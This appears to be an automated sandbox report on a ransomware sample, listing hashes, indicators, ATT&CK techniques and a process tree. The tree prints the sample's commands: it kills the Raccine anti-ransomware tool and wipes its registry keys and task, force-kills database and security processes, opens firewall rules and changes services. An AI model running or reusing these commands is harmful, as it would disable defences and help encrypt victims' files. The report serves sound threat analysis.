2c6802679ce8ac5ed90bd25d25805e284c7dd5269f7805c68cc5fd965a0adc21

Resubmissions

04-11-2021 15:34

211104-sz21psghe5 10

29-10-2021 15:29

211029-swzq6saccp 10

29-10-2021 07:07

211029-hxtanshefl 8

Analysis

max time kernel
127s
max time network
129s
platform
windows10_x64
resource
win10-en-20211014
submitted
29-10-2021 15:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Worker-1.exe
Size

385KB
MD5

7677a593678d9c4552578fab18a27384
SHA1

5c3b0d278df728c67122ac3ab7184c3f9ebfaa4f
SHA256

2c6802679ce8ac5ed90bd25d25805e284c7dd5269f7805c68cc5fd965a0adc21
SHA512

8bbce3eefabf7e7d900ba3fa0a42ca3be265425c8b5675e27839a1397d1653ae54e3abbd8a6b0b8ff7ab44d130afb1a81d04d57af42dc45e7227d676a335e082

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

description	flow	ioc
HTTP URL	32	http://live.sysinternals.com/PsExec.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\ConnectDeny.tif => C:\Users\Admin\Pictures\ConnectDeny.tif.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\ConnectDeny.tif.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\InitializeTest.crw => C:\Users\Admin\Pictures\InitializeTest.crw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeTest.crw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\RegisterUnblock.png.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\UninstallPublish.crw.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\RegisterUnblock.png => C:\Users\Admin\Pictures\RegisterUnblock.png.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\ResolveSync.png => C:\Users\Admin\Pictures\ResolveSync.png.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\ResolveSync.png.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\UninstallPublish.crw => C:\Users\Admin\Pictures\UninstallPublish.crw.v4cnyy	Worker-1.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	Worker-1.exe
File opened (read-only)	\??\G:	Worker-1.exe
File opened (read-only)	\??\L:	Worker-1.exe
File opened (read-only)	\??\B:	Worker-1.exe
File opened (read-only)	\??\T:	Worker-1.exe
File opened (read-only)	\??\Y:	Worker-1.exe
File opened (read-only)	\??\I:	Worker-1.exe
File opened (read-only)	\??\P:	Worker-1.exe
File opened (read-only)	\??\M:	Worker-1.exe
File opened (read-only)	\??\W:	Worker-1.exe
File opened (read-only)	\??\U:	Worker-1.exe
File opened (read-only)	\??\H:	Worker-1.exe
File opened (read-only)	\??\V:	Worker-1.exe
File opened (read-only)	\??\N:	Worker-1.exe
File opened (read-only)	\??\Q:	Worker-1.exe
File opened (read-only)	\??\E:	Worker-1.exe
File opened (read-only)	\??\S:	Worker-1.exe
File opened (read-only)	\??\K:	Worker-1.exe
File opened (read-only)	\??\Z:	Worker-1.exe
File opened (read-only)	\??\X:	Worker-1.exe
File opened (read-only)	\??\R:	Worker-1.exe
File opened (read-only)	\??\O:	Worker-1.exe
File opened (read-only)	\??\A:	Worker-1.exe
File opened (read-only)	\??\J:	Worker-1.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	Worker-1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	Worker-1.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

pid	Process
64	taskkill.exe
1132	taskkill.exe
2208	taskkill.exe
3980	taskkill.exe
3196	taskkill.exe
3800	taskkill.exe
660	taskkill.exe
3312	taskkill.exe
888	taskkill.exe
1576	taskkill.exe
1608	taskkill.exe
3640	taskkill.exe
1760	taskkill.exe
2804	taskkill.exe
3540	taskkill.exe
1016	taskkill.exe
1780	taskkill.exe
396	taskkill.exe
1164	taskkill.exe
1600	taskkill.exe
976	taskkill.exe
3488	taskkill.exe
3732	taskkill.exe
2100	taskkill.exe
948	taskkill.exe
2312	taskkill.exe
1984	taskkill.exe
1100	taskkill.exe
3364	taskkill.exe
1576	taskkill.exe
2524	taskkill.exe
3140	taskkill.exe
3092	taskkill.exe
2224	taskkill.exe
2480	taskkill.exe
684	taskkill.exe
3732	taskkill.exe
1032	taskkill.exe
2004	taskkill.exe
3092	taskkill.exe
2276	taskkill.exe
2976	taskkill.exe
2840	taskkill.exe
1352	taskkill.exe
872	taskkill.exe
516	taskkill.exe
1988	taskkill.exe
2088	taskkill.exe
2836	taskkill.exe
2276	taskkill.exe
400	taskkill.exe
1484	taskkill.exe
2268	taskkill.exe
2296	taskkill.exe
916	taskkill.exe
3164	taskkill.exe
1656	taskkill.exe
2224	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3936	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2452	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe
2732	Worker-1.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

description	pid	Process
Token: SeDebugPrivilege	2732	Worker-1.exe
Token: SeDebugPrivilege	2732	Worker-1.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeDebugPrivilege	2524	taskkill.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	3092	taskkill.exe
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeDebugPrivilege	1032	taskkill.exe
Token: SeDebugPrivilege	2804	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	516	taskkill.exe
Token: SeDebugPrivilege	3488	taskkill.exe
Token: SeDebugPrivilege	64	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	2976	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	3640	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	3732	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	1132	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	400	taskkill.exe
Token: SeDebugPrivilege	2840	taskkill.exe
Token: SeDebugPrivilege	2312	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	2100	taskkill.exe
Token: SeDebugPrivilege	2268	taskkill.exe
Token: SeDebugPrivilege	3196	taskkill.exe
Token: SeDebugPrivilege	3164	taskkill.exe
Token: SeDebugPrivilege	3540	taskkill.exe
Token: SeDebugPrivilege	3092	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	976	taskkill.exe
Token: SeDebugPrivilege	3312	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	684	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	3732	taskkill.exe
Token: SeDebugPrivilege	888	taskkill.exe
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	2120	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2732	Worker-1.exe
2732	Worker-1.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
2732	Worker-1.exe
2732	Worker-1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2732 wrote to memory of 948	2732	Worker-1.exe	70
PID 2732 wrote to memory of 948	2732	Worker-1.exe	70
PID 2732 wrote to memory of 948	2732	Worker-1.exe	70
PID 2732 wrote to memory of 2244	2732	Worker-1.exe	72
PID 2732 wrote to memory of 2244	2732	Worker-1.exe	72
PID 2732 wrote to memory of 2244	2732	Worker-1.exe	72
PID 2732 wrote to memory of 3936	2732	Worker-1.exe	74
PID 2732 wrote to memory of 3936	2732	Worker-1.exe	74
PID 2732 wrote to memory of 3936	2732	Worker-1.exe	74
PID 2732 wrote to memory of 3480	2732	Worker-1.exe	76
PID 2732 wrote to memory of 3480	2732	Worker-1.exe	76
PID 2732 wrote to memory of 3480	2732	Worker-1.exe	76
PID 2732 wrote to memory of 2836	2732	Worker-1.exe	78
PID 2732 wrote to memory of 2836	2732	Worker-1.exe	78
PID 2732 wrote to memory of 2836	2732	Worker-1.exe	78
PID 2732 wrote to memory of 4052	2732	Worker-1.exe	81
PID 2732 wrote to memory of 4052	2732	Worker-1.exe	81
PID 2732 wrote to memory of 4052	2732	Worker-1.exe	81
PID 2732 wrote to memory of 1240	2732	Worker-1.exe	80
PID 2732 wrote to memory of 1240	2732	Worker-1.exe	80
PID 2732 wrote to memory of 1240	2732	Worker-1.exe	80
PID 2732 wrote to memory of 2376	2732	Worker-1.exe	84
PID 2732 wrote to memory of 2376	2732	Worker-1.exe	84
PID 2732 wrote to memory of 2376	2732	Worker-1.exe	84
PID 2732 wrote to memory of 3720	2732	Worker-1.exe	86
PID 2732 wrote to memory of 3720	2732	Worker-1.exe	86
PID 2732 wrote to memory of 3720	2732	Worker-1.exe	86
PID 2732 wrote to memory of 1196	2732	Worker-1.exe	88
PID 2732 wrote to memory of 1196	2732	Worker-1.exe	88
PID 2732 wrote to memory of 1196	2732	Worker-1.exe	88
PID 2732 wrote to memory of 944	2732	Worker-1.exe	90
PID 2732 wrote to memory of 944	2732	Worker-1.exe	90
PID 2732 wrote to memory of 944	2732	Worker-1.exe	90
PID 2732 wrote to memory of 2384	2732	Worker-1.exe	92
PID 2732 wrote to memory of 2384	2732	Worker-1.exe	92
PID 2732 wrote to memory of 2384	2732	Worker-1.exe	92
PID 2732 wrote to memory of 1132	2732	Worker-1.exe	93
PID 2732 wrote to memory of 1132	2732	Worker-1.exe	93
PID 2732 wrote to memory of 1132	2732	Worker-1.exe	93
PID 2732 wrote to memory of 1484	2732	Worker-1.exe	96
PID 2732 wrote to memory of 1484	2732	Worker-1.exe	96
PID 2732 wrote to memory of 1484	2732	Worker-1.exe	96
PID 2732 wrote to memory of 1576	2732	Worker-1.exe	99
PID 2732 wrote to memory of 1576	2732	Worker-1.exe	99
PID 2732 wrote to memory of 1576	2732	Worker-1.exe	99
PID 2732 wrote to memory of 1656	2732	Worker-1.exe	98
PID 2732 wrote to memory of 1656	2732	Worker-1.exe	98
PID 2732 wrote to memory of 1656	2732	Worker-1.exe	98
PID 2732 wrote to memory of 2524	2732	Worker-1.exe	102
PID 2732 wrote to memory of 2524	2732	Worker-1.exe	102
PID 2732 wrote to memory of 2524	2732	Worker-1.exe	102
PID 2732 wrote to memory of 3980	2732	Worker-1.exe	103
PID 2732 wrote to memory of 3980	2732	Worker-1.exe	103
PID 2732 wrote to memory of 3980	2732	Worker-1.exe	103
PID 2732 wrote to memory of 3092	2732	Worker-1.exe	106
PID 2732 wrote to memory of 3092	2732	Worker-1.exe	106
PID 2732 wrote to memory of 3092	2732	Worker-1.exe	106
PID 2732 wrote to memory of 872	2732	Worker-1.exe	108
PID 2732 wrote to memory of 872	2732	Worker-1.exe	108
PID 2732 wrote to memory of 872	2732	Worker-1.exe	108
PID 2732 wrote to memory of 1032	2732	Worker-1.exe	110
PID 2732 wrote to memory of 1032	2732	Worker-1.exe	110
PID 2732 wrote to memory of 1032	2732	Worker-1.exe	110
PID 2732 wrote to memory of 2804	2732	Worker-1.exe	112

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	Worker-1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	Worker-1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	Worker-1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	Worker-1.exe

C:\Users\Admin\AppData\Local\Temp\Worker-1.exe
"C:\Users\Admin\AppData\Local\Temp\Worker-1.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2732
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:948
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:2244
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3936
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:3480
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2836
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1240
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:4052
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:2376
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:3720
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1196
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:944
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:2384
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1132
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1576
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2524
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3092
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:872
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1032
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2804
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1780
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3800
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3140
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:516
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3488
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:64
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1100
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:916
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:660
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1352
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2224
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2976
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3640
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2088
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:2480
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1132
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:396
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3364
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:2276
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2208
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:400
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2840
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2312
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2100
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2268
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3196
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3540
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3092
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1576
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1016
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3312
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:684
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:976
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:2468
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2276
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:888
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2224
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
